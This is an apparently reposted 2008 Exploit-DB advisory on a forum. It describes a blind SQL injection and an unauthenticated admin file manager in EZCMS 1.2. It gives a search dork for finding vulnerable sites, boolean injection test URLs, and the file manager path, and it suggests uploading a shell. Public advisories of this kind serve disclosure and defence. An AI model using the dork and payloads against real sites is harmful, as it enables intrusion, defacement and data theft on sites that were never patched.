Exploit ezcms 1.2 - Blind SQL Injection / Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5819
Проверка EDB
  1. Пройдено
Автор
T0PP8UZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2921 cve-2008-2920
Дата публикации
2008-06-14
Код:
-[*]+================================================================================+[*]-
-[*]+		       EZCMS <= 1.2 Multiple Remote Vulnerabilitys	             +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: t0pP8uZz
[*] Discovered On: 19 MAY 2008
[*] Script Download: http://eztechhelp.com
[*] DORK google/altavista: "Powered by EZCMS"



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION: 

	EZCMS (all versions prior to date) suffers from 2 remote vulnerabilitys.
	
	One of these being a BLIND Sql Injection in "index.php" and the "page" variable is injectable.
	see example below.

	The second one being a insecure filemanager, the filemanager is hidden away in admin, the devs
	probarly thought no one would find it.. but here i am telling you  ;)  
	see more below.



[*] Blind SQL Injection:

	http://site.com/index.php?page=1 and 1=1
	http://site.com/index.php?page=1 and 1=2



[*] Arbitrary Remote File Manager Access:

	http://site.com/ezcms/admin/filemanager/



[*] NOTE/TIP: 

	no exploit coded for the blind injection, because no point due to you can get a easy shell
	through the file manager, althou if your curious, use SQLMap. (check sourceforge)

	the "File Manager" is a very easy to use bug, just browse to site.com/ezcms/admin/filemanager/
	site.com being the actual site and you can upload/edit/delete/upload/move  files/folders.



[*] GREETZ: 

	milw0rm.com, h4ck-y0u.org, CipherCrew !



[-] peace, 

	t0pP8uZz



-[*]+================================================================================+[*]-
-[*]+		       EZCMS <= 1.2 Multiple Remote Vulnerabilitys	             +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-06-14]
 
Источник
www.exploit-db.com

Похожие темы